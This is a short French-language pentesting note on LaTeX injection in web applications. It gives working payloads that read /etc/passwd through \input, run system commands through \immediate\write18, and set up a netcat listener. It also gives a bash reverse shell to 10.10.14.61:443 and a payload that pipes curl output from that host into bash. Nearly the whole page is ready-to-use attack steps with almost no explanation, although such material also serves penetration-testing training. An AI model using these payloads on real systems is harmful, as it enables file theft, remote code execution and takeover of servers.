LaTeX Injection Vulnerability: File Read/RCE - Pentesting Web

Nous interceptons la requête

Nous injectons :

\input{/etc/passwd}
\include{password}

Nous exécutons une commande id via :

\immediate\write18{id > output}
\newread\file
\openin\file=output
\read\file to\line
\text{\line}
\closein\file

Nous écoutons sur le port 443 :

nc -nvlp 443

Nous créons un script bash index.html :

 #!/bin/bash
 bash -i >& /dev/tcp/10.10.14.61/443 0>&1

Nous lançons un serveur web :

python3 -m http.server 80

Injection du payload :

\immediate\write18{curl http://10.10.14.61 | bash > output}
\newread\file
\openin\file=output
\read\file to\line
\text{\line}
\closein\file

Mis à jour il y a 9 mois

Ce contenu vous a-t-il été utile ?